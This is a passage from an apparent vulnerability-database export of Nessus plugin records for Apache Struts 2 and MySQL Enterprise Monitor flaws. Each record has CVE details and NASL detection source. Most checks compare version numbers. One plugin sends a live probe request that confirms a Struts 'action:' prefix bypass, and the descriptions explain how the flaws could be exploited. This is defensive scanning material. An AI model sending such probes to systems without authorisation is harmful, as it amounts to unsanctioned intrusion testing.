or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.17\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:07", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities :\n\n - A flaw exists within 'MultipartStream.java' in Apache Commons FileUpload when parsing malformed Content-Type headers. A remote attacker, using a crafted header, can exploit this to cause an infinite loop, resulting in a denial of service. (CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor and CookieInterceptor classes, within the included Apache Struts 2 component, which are due to a failure to properly restrict access to their getClass() methods. A remote attacker, using a crafted request, can exploit these flaws to manipulate the ClassLoader, thus allowing the execution of arbitrary code or modification of the session state. 
Note that vulnerabilities CVE-2014-0112 and CVE-2014-0116 occurred because the patches for CVE-2014-0094 and CVE-2014-0113, respectively, were not complete fixes. (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116)", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.0.x < 3.0.11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts", "cpe:/a:apache:tomcat"], "id": "MYSQL_ENTERPRISE_MONITOR_3_0_11.NASL", "href": "https://www.tenable.com/plugins/nessus/83295", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83295);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2014-0050\",\n \"CVE-2014-0094\",\n \"CVE-2014-0112\",\n \"CVE-2014-0113\",\n \"CVE-2014-0116\"\n );\n script_bugtraq_id(\n 65400,\n 65999,\n 67064,\n 67081,\n 67218\n );\n script_xref(name:\"CERT\", value:\"719225\");\n script_xref(name:\"EDB-ID\", value:\"33142\");\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.0.x < 3.0.11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by multiple vulnerabilities :\n\n - A flaw exists within 'MultipartStream.java' in Apache\n Commons FileUpload when 
parsing malformed Content-Type\n headers. A remote attacker, using a crafted header,\n can exploit this to cause an infinite loop, resulting\n in a denial of service. (CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor\n and CookieInterceptor classes, within the included\n Apache Struts 2 component, which are due to a failure to\n properly restrict access to their getClass() methods. A\n remote attacker, using a crafted request, can exploit\n these flaws to manipulate the ClassLoader, thus allowing\n the execution of arbitrary code or modification of the\n session state. Note that vulnerabilities CVE-2014-0112\n and CVE-2014-0116 occurred because the patches for\n CVE-2014-0094 and CVE-2014-0113, respectively, were not\n complete fixes. (CVE-2014-0094, CVE-2014-0112,\n CVE-2014-0113, CVE-2014-0116)\");\n # https://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56618dc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-022\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 3.0.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2014/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"3.0.11\";\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (version =~ \"^3\\.0($|[^0-9])\" && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:18", "description": "The remote web server is using a version of Struts 2 that is affected by multiple vulnerabilities :\n\n 
- A cross-site request forgery vulnerability exists due to the token generator failing to adequately randomize the token values. An attacker can exploit this issue by extracting a token from a form and then predicting the next token value that will be used to secure form submissions. By convincing a victim to visit a specially crafted form, the predicted token value can be used to force an action for a logged in user. Note that this vulnerability can only be exploited when the <s:token/> tag is used within a form. (CVE-2014-7809)\n\n - A cross-site scripting vulnerability exists due to improper validation of input passed via the 'Problem Report' screen when using debug mode. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in the context of a user's browser session.\n (CVE-2015-5169)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2014-12-10T00:00:00", "type": "nessus", "title": "Apache Struts 2 Multiple Vulnerabilities (S2-023) (S2-025)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7809", "CVE-2015-5169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_20_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/79860", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79860);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-7809\", \"CVE-2015-5169\");\n script_bugtraq_id(71548, 76625);\n\n script_name(english:\"Apache Struts 2 Multiple Vulnerabilities (S2-023) (S2-025)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a web application that uses a 
Java\nframework that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is using a version of Struts 2 that is affected\nby multiple vulnerabilities :\n\n - A cross-site request forgery vulnerability exists due to\n the token generator failing to adequately randomize the\n token values. An attacker can exploit this issue by\n extracting a token from a form and then predicting the\n next token value that will be used to secure form\n submissions. By convincing a victim to visit a specially\n crafted form, the predicted token value can be used to\n force an action for a logged in user. Note that this\n vulnerability can only be exploited when the <s:token/>\n tag is used within a form. (CVE-2014-7809)\n\n - A cross-site scripting vulnerability exists due to\n improper validation of input passed via the 'Problem\n Report' screen when using debug mode. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to execute arbitrary script\n code in the context of a user's browser session.\n (CVE-2015-5169)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-023.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-025.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/WW-4423\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.20 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.16.3\", \"fixed_version\" : \"2.3.20\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xss:TRUE, xsrf:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:34", "description": "The remote web application appears to use Struts 2, a web framework used for creating Java web applications. 
The version of Struts 2 in use is affected by a security constraint bypass vulnerability due to a flaw in the action mapping mechanism. Under certain unspecified conditions, an attacker could exploit this issue to bypass security constraints. \n\nNote that this version of Struts 2 is known to have Dynamic Method Invocation (DMI) enabled by default. This can expose Struts 2 to additional vulnerabilities so it is recommended that DMI be disabled. (CVE-2013-4316)\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2013-09-27T00:00:00", "type": "nessus", "title": "Apache Struts 2 'action:' Parameter Prefix Security Constraint Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4310", "CVE-2013-4316"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_2.NASL", "href": "https://www.tenable.com/plugins/nessus/70168", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70168);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4310\", \"CVE-2013-4316\");\n script_bugtraq_id(62584);\n\n script_name(english:\"Apache Struts 2 'action:' Parameter Prefix Security Constraint Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a security constraint bypass\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nused for creating Java web applications. The version of Struts 2 in\nuse is affected by a security constraint bypass vulnerability due to a\nflaw in the action mapping mechanism. 
Under certain unspecified\nconditions, an attacker could exploit this issue to bypass security\nconstraints. \n\nNote that this version of Struts 2 is known to have Dynamic Method\nInvocation (DMI) enabled by default. This can expose Struts 2 to\nadditional vulnerabilities so it is recommended that DMI be disabled. \n(CVE-2013-4316)\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-018.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-019\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.15.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\nif (max_index(urls) == 0)\n audit(AUDIT_WEB_FILES_NOT, \"Struts 2 .action / .do / .jsp\", port);\n\nurls = list_uniq(urls);\n\nscript = SCRIPT_NAME - \".nasl\" + '-' + unixtime();\nvuln = FALSE;\n\nforeach url (urls)\n{\n vuln_url = url + \"?action:\" + script;\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n # Verify our 404 page contains our script name and verify that\n # .action was not appended to our script name as this would\n # 
indicate that 2.3.15.2 or later is in use\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> .*/\" + script &&\n res[2] !~ \"\\<b\\>message\\</b\\> .*/\" + script + \"\\.action\"\n )\n {\n vuln = TRUE;\n break;\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\noutput = strstr(res[2], \"message\");\nif (empty_or_null(output)) output = res[2];\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(output)\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:15:07", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.4.1. It, therefore, is affected by multiple vulnerabilities including a Denial of Service (DoS) and cross-site request forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.4.1 Multiple Vulnerabilities (S2-010) (S2-011)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4386", "CVE-2012-4387"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_4_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117400);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-4386\", \"CVE-2012-4387\");\n script_bugtraq_id(54346, 55346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.4.1 Multiple 
Vulnerabilities (S2-010) (S2-011)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.4.1. It, therefore, is affected by multiple\nvulnerabilities including a Denial of Service (DoS) and cross-site\nrequest forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.4.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-4386\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.4\", \"fixed_version\" : \"2.3.4.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xsrf:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:07", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the multiple vulnerabilities in the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution of arbitrary Object-Graph Navigation Language (OGNL) expressions via specially crafted parameters to the DefaultActionMapper. 
(CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to dynamic method invocation being enabled by default.\n (CVE-2013-4316)", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251", "CVE-2013-4316"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_14.NASL", "href": "https://www.tenable.com/plugins/nessus/83292", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83292);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2013-2251\", \"CVE-2013-4316\");\n script_bugtraq_id(61189, 62587);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by the multiple vulnerabilities\nin the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution\n of arbitrary Object-Graph Navigation Language (OGNL)\n expressions via specially crafted parameters to the\n DefaultActionMapper. 
(CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to\n dynamic method invocation being enabled by default.\n (CVE-2013-4316)\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n # http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ac29c174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 2.3.14 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.14\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:37:32", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. 
Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request.\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66931);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n 